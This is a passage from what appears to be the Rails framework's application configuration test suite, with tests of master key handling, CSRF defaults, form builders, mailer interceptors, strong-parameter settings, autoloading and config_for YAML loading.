  assert_equal "697361616320736c6f616e2028656c6f7265737429", app.secrets.smtp_settings[:password]
end
# config.require_master_key behavior when config/master.key is absent.
test "require_master_key aborts app boot when missing key" do
  skip "can't run without fork" unless Process.respond_to?(:fork)
  remove_file "config/master.key"
  add_to_config "config.require_master_key = true"
  # Boot in a forked child so the abort (exit 1) doesn't kill the test run.
  error = capture(:stderr) do
    Process.wait(Process.fork { app "development" })
  end
  assert_equal 1, $?.exitstatus
  assert_match(/Missing.*RAILS_MASTER_KEY/, error)
end
test "credentials does not raise error when require_master_key is false and master key does not exist" do
  remove_file "config/master.key"
  add_to_config "config.require_master_key = false"
  app "development"
  assert_not app.credentials.secret_key_base
end
# A freshly generated app has CSRF protection on; csrf_meta_tags should
# therefore render the csrf-param meta tag.
test "protect from forgery is the default in a new app" do
  make_basic_app
  class ::OmgController < ActionController::Base
    def index
      render inline: "<%= csrf_meta_tags %>"
    end
  end
  get "/"
  assert_match(/csrf\-param/, last_response.body)
end
# action_view.default_form_builder may be given as a class name string,
# resolved lazily so the constant can be defined in an initializer.
test "default form builder specified as a string" do
  app_file "config/initializers/form_builder.rb", <<-RUBY
    class CustomFormBuilder < ActionView::Helpers::FormBuilder
      def text_field(attribute, *args)
        label(attribute) + super(attribute, *args)
      end
    end
    Rails.configuration.action_view.default_form_builder = "CustomFormBuilder"
  RUBY
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      attr_accessor :name
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def index
        render inline: "<%= begin; form_for(Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  get "/posts"
  # The custom builder prepends a <label>, proving it was picked up.
  assert_match(/label/, last_response.body)
end
# form_with_generates_ids toggles whether form_with emits DOM ids.
test "form_with can be configured with form_with_generates_ids" do
  app_file "config/initializers/form_builder.rb", <<-RUBY
    Rails.configuration.action_view.form_with_generates_ids = false
  RUBY
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      attr_accessor :name
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def index
        render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  get "/posts"
  assert_no_match(/id=('|")post_name('|")/, last_response.body)
end
test "form_with outputs ids by default" do
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      attr_accessor :name
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def index
        render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  get "/posts"
  assert_match(/id=('|")post_name('|")/, last_response.body)
end
# form_with_generates_remote_forms toggles the data-remote attribute.
test "form_with can be configured with form_with_generates_remote_forms" do
  app_file "config/initializers/form_builder.rb", <<-RUBY
    Rails.configuration.action_view.form_with_generates_remote_forms = false
  RUBY
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      attr_accessor :name
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def index
        render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  get "/posts"
  assert_no_match(/data-remote/, last_response.body)
end
test "form_with generates remote forms by default" do
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      attr_accessor :name
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def index
        render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  get "/posts"
  assert_match(/data-remote/, last_response.body)
end
# form_for on a persisted record should emit the configured HTTP method for
# updates (PATCH by default), and both PATCH and PUT must route to #update.
test "default method for update can be changed" do
  app_file "app/models/post.rb", <<-RUBY
    class Post
      include ActiveModel::Model
      def to_key; [1]; end
      def persisted?; true; end
    end
  RUBY
  token = "cf50faa3fe97702ca1ae"
  # FIX: the stubbed form_authenticity_token must embed the *value* of the
  # test-local `token` via heredoc interpolation ("#{token}"). A bare `token`
  # reference was written into the generated controller, where no such method
  # or local exists — rendering raised NameError and the PATCH/PUT requests
  # failed CSRF verification instead of returning 200.
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def show
        render inline: "<%= begin; form_for(Post.new) {}; rescue => e; e.to_s; end %>"
      end
      def update
        render plain: "update"
      end
      private
        def form_authenticity_token(**); "#{token}"; end # stub the authenticity token
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  params = { authenticity_token: token }
  get "/posts/1"
  # The form for a persisted record carries the hidden _method=patch field.
  assert_match(/patch/, last_response.body)
  patch "/posts/1", params
  assert_match(/update/, last_response.body)
  patch "/posts/1", params
  assert_equal 200, last_response.status
  put "/posts/1", params
  assert_match(/update/, last_response.body)
  put "/posts/1", params
  assert_equal 200, last_response.status
end
test "request forgery token param can be changed" do
  make_basic_app do |application|
    application.config.action_controller.request_forgery_protection_token = "_xsrf_token_here"
  end
  class ::OmgController < ActionController::Base
    def index
      render inline: "<%= csrf_meta_tags %>"
    end
  end
  get "/"
  # The custom param name shows up in the csrf-param meta tag.
  assert_match "_xsrf_token_here", last_response.body
end
test "sets ActionDispatch.test_app" do
  make_basic_app
  assert_equal Rails.application, ActionDispatch.test_app
end
test "sets ActionDispatch::Response.default_charset" do
  make_basic_app do |application|
    application.config.action_dispatch.default_charset = "utf-16"
  end
  assert_equal "utf-16", ActionDispatch::Response.default_charset
end
# ActionMailer configuration forwarding: interceptors, preview interceptors,
# observers, and the deliver_later queue name. Each test touches
# ActionMailer::Base (`_ = ActionMailer::Base`) to force its lazy hooks.
test "registers interceptors with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.interceptors = MyMailInterceptor
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal [::MyMailInterceptor], ::Mail.class_variable_get(:@@delivery_interceptors)
end
test "registers multiple interceptors with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.interceptors = [MyMailInterceptor, "MyOtherMailInterceptor"]
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  # String entries are constantized.
  assert_equal [::MyMailInterceptor, ::MyOtherMailInterceptor], ::Mail.class_variable_get(:@@delivery_interceptors)
end
test "registers preview interceptors with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.preview_interceptors = MyPreviewMailInterceptor
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  # The built-in InlinePreviewInterceptor always comes first.
  assert_equal [ActionMailer::InlinePreviewInterceptor, ::MyPreviewMailInterceptor], ActionMailer::Base.preview_interceptors
end
test "registers multiple preview interceptors with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.preview_interceptors = [MyPreviewMailInterceptor, "MyOtherPreviewMailInterceptor"]
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal [ActionMailer::InlinePreviewInterceptor, MyPreviewMailInterceptor, MyOtherPreviewMailInterceptor], ActionMailer::Base.preview_interceptors
end
test "default preview interceptor can be removed" do
  app_file "config/initializers/preview_interceptors.rb", <<-RUBY
    ActionMailer::Base.preview_interceptors.delete(ActionMailer::InlinePreviewInterceptor)
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal [], ActionMailer::Base.preview_interceptors
end
test "registers observers with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.observers = MyMailObserver
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal [::MyMailObserver], ::Mail.class_variable_get(:@@delivery_notification_observers)
end
test "registers multiple observers with ActionMailer" do
  add_to_config <<-RUBY
    config.action_mailer.observers = [MyMailObserver, "MyOtherMailObserver"]
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal [::MyMailObserver, ::MyOtherMailObserver], ::Mail.class_variable_get(:@@delivery_notification_observers)
end
test "allows setting the queue name for the ActionMailer::MailDeliveryJob" do
  add_to_config <<-RUBY
    config.action_mailer.deliver_later_queue_name = 'test_default'
  RUBY
  app "development"
  require "mail"
  _ = ActionMailer::Base
  assert_equal "test_default", ActionMailer::Base.class_variable_get(:@@deliver_later_queue_name)
end
# time_zone and beginning_of_week validation at boot.
test "valid timezone is setup correctly" do
  add_to_config <<-RUBY
    config.root = "#{app_path}"
    config.time_zone = "Wellington"
  RUBY
  app "development"
  assert_equal "Wellington", Rails.application.config.time_zone
end
test "raises when an invalid timezone is defined in the config" do
  add_to_config <<-RUBY
    config.root = "#{app_path}"
    config.time_zone = "That big hill over yonder hill"
  RUBY
  assert_raise(ArgumentError) do
    app "development"
  end
end
test "valid beginning of week is setup correctly" do
  add_to_config <<-RUBY
    config.root = "#{app_path}"
    config.beginning_of_week = :wednesday
  RUBY
  app "development"
  assert_equal :wednesday, Rails.application.config.beginning_of_week
end
test "raises when an invalid beginning of week is defined in the config" do
  add_to_config <<-RUBY
    config.root = "#{app_path}"
    config.beginning_of_week = :invalid
  RUBY
  assert_raise(ArgumentError) do
    app "development"
  end
end
# Rails.autoloaders reflects config.autoloader: zeitwerk (default) exposes
# the main/once Zeitwerk loaders, classic exposes none; switching back and
# forth works, and unknown values raise.
test "autoloaders" do
  app "development"
  config = Rails.application.config
  assert Rails.autoloaders.zeitwerk_enabled?
  assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
  assert_equal "rails.main", Rails.autoloaders.main.tag
  assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
  assert_equal "rails.once", Rails.autoloaders.once.tag
  assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
  assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.main.inflector
  assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.once.inflector
  # Classic mode: no Zeitwerk loaders at all.
  config.autoloader = :classic
  assert_not Rails.autoloaders.zeitwerk_enabled?
  assert_nil Rails.autoloaders.main
  assert_nil Rails.autoloaders.once
  assert_equal 0, Rails.autoloaders.count
  config.autoloader = :zeitwerk
  assert Rails.autoloaders.zeitwerk_enabled?
  assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
  assert_equal "rails.main", Rails.autoloaders.main.tag
  assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
  assert_equal "rails.once", Rails.autoloaders.once.tag
  assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
  assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.main.inflector
  assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.once.inflector
  assert_raises(ArgumentError) { config.autoloader = :unknown }
end
# action_view.cache_template_loading defaults to cache_classes but can be
# overridden independently in either direction.
test "config.action_view.cache_template_loading with cache_classes default" do
  add_to_config "config.cache_classes = true"
  app "development"
  require "action_view/base"
  assert_equal true, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading without cache_classes default" do
  add_to_config "config.cache_classes = false"
  app "development"
  require "action_view/base"
  assert_equal false, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading = false" do
  add_to_config <<-RUBY
    config.cache_classes = true
    config.action_view.cache_template_loading = false
  RUBY
  app "development"
  require "action_view/base"
  assert_equal false, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading = true" do
  add_to_config <<-RUBY
    config.cache_classes = false
    config.action_view.cache_template_loading = true
  RUBY
  app "development"
  require "action_view/base"
  assert_equal true, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading with cache_classes in an environment" do
  build_app(initializers: true)
  add_to_env_config "development", "config.cache_classes = false"
  # These requires are to emulate an engine loading Action View before the application
  require "action_view"
  require "action_view/railtie"
  require "action_view/base"
  app "development"
  assert_equal false, ActionView::Resolver.caching?
end
test "config.action_dispatch.show_exceptions is sent in env" do
  make_basic_app do |application|
    application.config.action_dispatch.show_exceptions = true
  end
  class ::OmgController < ActionController::Base
    def index
      # The config value must be visible to middleware via the Rack env.
      render plain: request.env["action_dispatch.show_exceptions"]
    end
  end
  get "/"
  assert_equal "true", last_response.body
end
# wrap_parameters should nest JSON bodies under the model key, keeping only
# attributes declared by the model (here: title).
test "config.action_controller.wrap_parameters is set in ActionController::Base" do
  app_file "config/initializers/wrap_parameters.rb", <<-RUBY
    ActionController::Base.wrap_parameters format: [:json]
  RUBY
  app_file "app/models/post.rb", <<-RUBY
    class Post
      def self.attribute_names
        %w(title)
      end
    end
  RUBY
  app_file "app/controllers/application_controller.rb", <<-RUBY
    class ApplicationController < ActionController::Base
      protect_from_forgery with: :reset_session # as we are testing API here
    end
  RUBY
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ApplicationController
      def create
        render plain: params[:post].inspect
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
  RUBY
  app "development"
  post "/posts.json", '{ "title": "foo", "name": "bar" }', "CONTENT_TYPE" => "application/json"
  assert_equal '<ActionController::Parameters {"title"=>"foo"} permitted: false>', last_response.body
end
test "config.action_controller.permit_all_parameters = true" do
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ActionController::Base
      def create
        render plain: params[:post].permitted? ? "permitted" : "forbidden"
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
    config.action_controller.permit_all_parameters = true
  RUBY
  app "development"
  post "/posts", post: { "title" => "zomg" }
  assert_equal "permitted", last_response.body
end
test "config.action_controller.action_on_unpermitted_parameters = :raise" do
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ActionController::Base
      def create
        render plain: params.require(:post).permit(:name)
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
    config.action_controller.action_on_unpermitted_parameters = :raise
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
  # :title is unpermitted, so the request blows up with the dev error page.
  post "/posts", post: { "title" => "zomg" }
  assert_match "We're sorry, but something went wrong", last_response.body
end
# always_permitted_parameters defaults, overrides, and per-environment
# defaults of action_on_unpermitted_parameters.
test "config.action_controller.always_permitted_parameters are: controller, action by default" do
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal %w(controller action), ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.always_permitted_parameters = ['controller', 'action', 'format']" do
  add_to_config <<-RUBY
    config.action_controller.always_permitted_parameters = %w( controller action format )
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal %w( controller action format ), ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.always_permitted_parameters = ['controller','action','format'] does not raise exception" do
  app_file "app/controllers/posts_controller.rb", <<-RUBY
    class PostsController < ActionController::Base
      def create
        render plain: params.permit(post: [:title])
      end
    end
  RUBY
  add_to_config <<-RUBY
    routes.prepend do
      resources :posts
    end
    config.action_controller.always_permitted_parameters = %w( controller action format )
    config.action_controller.action_on_unpermitted_parameters = :raise
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
  # format is always-permitted, so even with :raise the request succeeds.
  post "/posts", post: { "title" => "zomg" }, format: "json"
  assert_equal 200, last_response.status
end
test "config.action_controller.action_on_unpermitted_parameters is :log by default in development" do
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal :log, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters is :log by default in test" do
  app "test"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal :log, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters is false by default in production" do
  app "production"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal false, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.default_protect_from_forgery is true by default" do
  app "development"
  assert_equal true, ActionController::Base.default_protect_from_forgery
  # The CSRF before_action must actually be installed in the callback chain.
  assert_includes ActionController::Base.__callbacks[:process_action].map(&:filter), :verify_authenticity_token
end
# The following settings must also take effect when assigned from an
# initializer rather than application config.
test "config.action_controller.permit_all_parameters can be configured in an initializer" do
  app_file "config/initializers/permit_all_parameters.rb", <<-RUBY
    Rails.application.config.action_controller.permit_all_parameters = true
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal true, ActionController::Parameters.permit_all_parameters
end
test "config.action_controller.always_permitted_parameters can be configured in an initializer" do
  app_file "config/initializers/always_permitted_parameters.rb", <<-RUBY
    Rails.application.config.action_controller.always_permitted_parameters = []
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal [], ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters can be configured in an initializer" do
  app_file "config/initializers/action_on_unpermitted_parameters.rb", <<-RUBY
    Rails.application.config.action_controller.action_on_unpermitted_parameters = :raise
  RUBY
  app "development"
  require "action_controller/base"
  require "action_controller/api"
  assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_dispatch.ignore_accept_header" do
  make_basic_app do |application|
    application.config.action_dispatch.ignore_accept_header = true
  end
  class ::OmgController < ActionController::Base
    def index
      respond_to do |format|
        format.html { render plain: "HTML" }
        format.xml { render plain: "XML" }
      end
    end
  end
  # The Accept header is ignored...
  get "/", {}, { "HTTP_ACCEPT" => "application/xml" }
  assert_equal "HTML", last_response.body
  # ...but an explicit format param still wins.
  get "/", { format: :xml }, { "HTTP_ACCEPT" => "application/xml" }
  assert_equal "XML", last_response.body
end
test "Rails.application#env_config exists and includes some existing parameters" do
  make_basic_app
  assert_equal app.env_config["action_dispatch.parameter_filter"], app.config.filter_parameters
  assert_equal app.env_config["action_dispatch.show_exceptions"], app.config.action_dispatch.show_exceptions
  assert_equal app.env_config["action_dispatch.logger"], Rails.logger
  assert_equal app.env_config["action_dispatch.backtrace_cleaner"], Rails.backtrace_cleaner
  assert_equal app.env_config["action_dispatch.key_generator"], Rails.application.key_generator
end
test "config.colorize_logging default is true" do
  make_basic_app
  assert app.config.colorize_logging
end
test "config.session_store with :active_record_store with activerecord-session_store gem" do
  make_basic_app do |application|
    # Fake the constant the gem would define; removed again in ensure below.
    ActionDispatch::Session::ActiveRecordStore = Class.new(ActionDispatch::Session::CookieStore)
    application.config.session_store :active_record_store
  end
ensure
  ActionDispatch::Session.send :remove_const, :ActiveRecordStore
end
test "config.session_store with :active_record_store without activerecord-session_store gem" do
  e = assert_raise RuntimeError do
    make_basic_app do |application|
      application.config.session_store :active_record_store
    end
  end
  # The error should point the user at the missing gem.
  assert_match(/activerecord-session_store/, e.message)
end
test "default session store initializer does not overwrite the user defined session store even if it is disabled" do
  make_basic_app do |application|
    application.config.session_store :disabled
  end
  assert_nil app.config.session_store
end
test "default session store initializer sets session store to cookie store" do
session_options = { key: "_myapp_session", cookie_only: true }
make_basic_app
assert_equal ActionDispatch::Session::CookieStore, app.config.session_store
assert_equal session_options, app.config.session_options
end
test "config.log_level with custom logger" do
make_basic_app do |application|
application.config.logger = Logger.new(STDOUT)
application.config.log_level = :info
end
assert_equal Logger::INFO, Rails.logger.level
end
test "respond_to? accepts include_private" do
make_basic_app
assert_not_respond_to Rails.configuration, :method_missing
assert Rails.configuration.respond_to?(:method_missing, true)
end
test "config.active_record.dump_schema_after_migration is false on production" do
build_app
app "production"
assert_not ActiveRecord::Base.dump_schema_after_migration
end
test "config.active_record.dump_schema_after_migration is true by default in development" do
app "development"
assert ActiveRecord::Base.dump_schema_after_migration
end
test "config.active_record.verbose_query_logs is false by default in development" do
app "development"
assert_not ActiveRecord::Base.verbose_query_logs
end
test "config.annotations wrapping SourceAnnotationExtractor::Annotation class" do
make_basic_app do |application|
application.config.annotations.register_extensions("coffee") do |tag|
/#\s*(#{tag}):?\s*(.*)$/
end
end
assert_not_nil Rails::SourceAnnotationExtractor::Annotation.extensions[/\.(coffee)$/]
end
test "config.default_log_file returns a File instance" do
app "development"
assert_instance_of File, app.config.default_log_file
assert_equal Rails.application.config.paths["log"].first, app.config.default_log_file.path
end
test "rake_tasks block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
rake_tasks do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
require "rake"
require "rake/testtask"
require "rdoc/task"
Rails.application.load_tasks
assert Rails.configuration.ran_block
end
test "generators block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
generators do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_generators
assert Rails.configuration.ran_block
end
test "console block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
console do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_console
assert Rails.configuration.ran_block
end
test "runner block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
runner do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_runner
assert Rails.configuration.ran_block
end
test "loading the first existing database configuration available" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.paths.add 'config/database', with: 'config/nonexistent.yml'
config.paths['config/database'] << 'config/database.yml'
end
RUBY
app "development"
assert_kind_of Hash, Rails.application.config.database_configuration
end
test "autoload paths do not include asset paths" do
app "development"
ActiveSupport::Dependencies.autoload_paths.each do |path|
assert_not_operator path, :end_with?, "app/assets"
assert_not_operator path, :end_with?, "app/javascript"
end
end
test "autoload paths will exclude the configured javascript_path" do
add_to_config "config.javascript_path = 'webpack'"
app_dir("app/webpack")
app "development"
ActiveSupport::Dependencies.autoload_paths.each do |path|
assert_not_operator path, :end_with?, "app/assets"
assert_not_operator path, :end_with?, "app/webpack"
end
end
test "autoload paths are added to $LOAD_PATH by default" do
app "development"
# Action Mailer modifies AS::Dependencies.autoload_paths in-place.
autoload_paths = ActiveSupport::Dependencies.autoload_paths
autoload_paths_from_app_and_engines = autoload_paths.reject do |path|
path.end_with?("mailers/previews")
end
assert_equal true, Rails.configuration.add_autoload_paths_to_load_path
assert_empty autoload_paths_from_app_and_engines - $LOAD_PATH
# Precondition, ensure we are testing something next.
assert_not_empty Rails.configuration.paths.load_paths
assert_empty Rails.configuration.paths.load_paths - $LOAD_PATH
end
test "autoload paths are not added to $LOAD_PATH if opted-out" do
add_to_config "config.add_autoload_paths_to_load_path = false"
app "development"
assert_empty ActiveSupport::Dependencies.autoload_paths & $LOAD_PATH
# Precondition, ensure we are testing something next.
assert_not_empty Rails.configuration.paths.load_paths
assert_empty Rails.configuration.paths.load_paths - $LOAD_PATH
end
test "autoload paths can be set in the config file of the environment" do
app_dir "custom_autoload_path"
app_dir "custom_autoload_once_path"
app_dir "custom_eager_load_path"
restore_default_config
add_to_env_config "development", <<-RUBY
config.autoload_paths << "#{app_path}/custom_autoload_path"
config.autoload_once_paths << "#{app_path}/custom_autoload_once_path"
config.eager_load_paths << "#{app_path}/custom_eager_load_path"
RUBY
app "development"
Rails.application.config.tap do |config|
assert_includes config.autoload_paths, "#{app_path}/custom_autoload_path"
assert_includes config.autoload_once_paths, "#{app_path}/custom_autoload_once_path"
assert_includes config.eager_load_paths, "#{app_path}/custom_eager_load_path"
end
assert_includes $LOAD_PATH, "#{app_path}/custom_autoload_path"
assert_includes $LOAD_PATH, "#{app_path}/custom_autoload_once_path"
assert_includes $LOAD_PATH, "#{app_path}/custom_eager_load_path"
end
test "autoloading during initialization gets deprecation message and clearing if config.cache_classes is false" do
app_file "lib/c.rb", <<~EOS
class C
extend ActiveSupport::DescendantsTracker
end
class X < C
end
EOS
app_file "app/models/d.rb", <<~EOS
require "c"
class D < C
end
EOS
app_file "config/initializers/autoload.rb", "D.class"
app "development"
# TODO: Test deprecation message, assert_depcrecated { app "development" }
# does not collect it.
assert_equal [X], C.descendants
assert_empty ActiveSupport::Dependencies.autoloaded_constants
end
test "autoloading during initialization triggers nothing if config.cache_classes is true" do
app_file "lib/c.rb", <<~EOS
class C
extend ActiveSupport::DescendantsTracker
end
class X < C
end
EOS
app_file "app/models/d.rb", <<~EOS
require "c"
class D < C
end
EOS
app_file "config/initializers/autoload.rb", "D.class"
app "production"
# TODO: Test no deprecation message is issued.
assert_equal [X, D], C.descendants
end
test "load_database_yaml returns blank hash if configuration file is blank" do
app_file "config/database.yml", ""
app "development"
assert_equal({}, Rails.application.config.load_database_yaml)
end
test "raises with proper error message if no database configuration found" do
FileUtils.rm("#{app_path}/config/database.yml")
err = assert_raises RuntimeError do
app "development"
Rails.application.config.database_configuration
end
assert_match "config/database", err.message
end
test "loads database.yml using shared keys" do
app_file "config/database.yml", <<-YAML
shared:
username: bobby
adapter: sqlite3
development:
database: 'dev_db'
YAML
app "development"
ar_config = Rails.application.config.database_configuration
assert_equal "sqlite3", ar_config["development"]["adapter"]
assert_equal "bobby", ar_config["development"]["username"]
assert_equal "dev_db", ar_config["development"]["database"]
end
test "loads database.yml using shared keys for undefined environments" do
app_file "config/database.yml", <<-YAML
shared:
username: bobby
adapter: sqlite3
database: 'dev_db'
YAML
app "development"
ar_config = Rails.application.config.database_configuration
assert_equal "sqlite3", ar_config["development"]["adapter"]
assert_equal "bobby", ar_config["development"]["username"]
assert_equal "dev_db", ar_config["development"]["database"]
end
test "config.action_mailer.show_previews defaults to true in development" do
app "development"
assert Rails.application.config.action_mailer.show_previews
end
test "config.action_mailer.show_previews defaults to false in production" do
app "production"
assert_equal false, Rails.application.config.action_mailer.show_previews
end
test "config.action_mailer.show_previews can be set in the configuration file" do
add_to_config <<-RUBY
config.action_mailer.show_previews = true
RUBY
app "production"
assert_equal true, Rails.application.config.action_mailer.show_previews
end
test "config_for loads custom configuration from yaml accessible as symbol or string" do
set_custom_config <<~RUBY
development:
foo: "bar"
RUBY
app "development"
assert_equal "bar", Rails.application.config.my_custom_config[:foo]
assert_equal "bar", Rails.application.config.my_custom_config["foo"]
end
test "config_for loads nested custom configuration from yaml as symbol keys" do
set_custom_config <<~RUBY
development:
foo:
bar:
baz: 1
RUBY
app "development"
assert_equal 1, Rails.application.config.my_custom_config[:foo][:bar][:baz]
end
test "config_for makes all hash methods available" do
set_custom_config <<~RUBY
development:
foo: 0
bar:
baz: 1
RUBY
app "development"
actual = Rails.application.config.my_custom_config
assert_equal({ foo: 0, bar: { baz: 1 } }, actual)
assert_equal([ :foo, :bar ], actual.keys)
assert_equal([ 0, baz: 1], actual.values)
assert_equal({ foo: 0, bar: { baz: 1 } }, actual.to_h)
assert_equal(0, actual[:foo])
assert_equal({ baz: 1 }, actual[:bar])
end
test "config_for does not assume config is a hash" do
set_custom_config <<~RUBY
development:
- foo
- bar
RUBY
app "development"
assert_equal %w( foo bar ), Rails.application.config.my_custom_config
end
test "config_for uses the Pathname object if it is provided" do
set_custom_config <<~RUBY, "Pathname.new(Rails.root.join('config/custom.yml'))"
development:
key: 'custom key'
RUBY
app "development"
assert_equal "custom key", Rails.application.config.my_custom_config[:key]
end
test "config_for raises an exception if the file does not exist" do
add_to_config <<-RUBY
config.my_custom_config = config_for('custom')
RUBY
exception = assert_raises(RuntimeError) do
app "development"
end
assert_equal "Could not load configuration. No such file - #{app_path}/config/custom.yml", exception.message
end
test "config_for without the environment configured returns nil" do
set_custom_config <<~RUBY
test:
key: 'custom key'
RUBY
app "development"
assert_nil Rails.application.config.my_custom_config
end
test "config_for shared config is overridden" do
set_custom_config <<~RUBY
shared:
foo: :from_shared
test:
foo: :from_env
RUBY
app "test"
assert_equal :from_env, Rails.application.config.my_custom_config[:foo]
end
test "config_for shared config is returned when environment is missing" do
set_custom_config <<~RUBY
shared:
foo: :from_shared
test:
foo: :from_env
RUBY
app "development"
assert_equal :from_shared, Rails.application.config.my_custom_config[:foo]
end
test "config_for merges shared configuration deeply" do
set_custom_config <<~RUBY
shared:
foo:
bar:
baz: 1
development:
foo:
bar:
qux: 2
RUBY
app "development"
assert_equal({ baz: 1, qux: 2 }, Rails.application.config.my_custom_config[:foo][:bar])
end
test "config_for with empty file returns nil" do
set_custom_config ""
app "development"
assert_nil Rails.application.config.my_custom_config
end
test "config_for containing ERB tags should evaluate" do
set_custom_config <<~RUBY
development:
key: <%= 'custom key' %>
RUBY
app "development"
assert_equal "custom key", Rails.application.config.my_custom_config[:key]
end
test "config_for with syntax error show a more descriptive exception" do
set_custom_config <<~RUBY
development:
key: foo:
RUBY
error = assert_raises RuntimeError do
app "development"
end
assert_match "YAML syntax error occurred while parsing", error.message
end
test "config_for allows overriding the environment" do
set_custom_config <<~RUBY, "'custom', env: 'production'"
test:
key: 'walrus'
production:
key: 'unicorn'
RUBY
require "#{app_path}/config/environment"
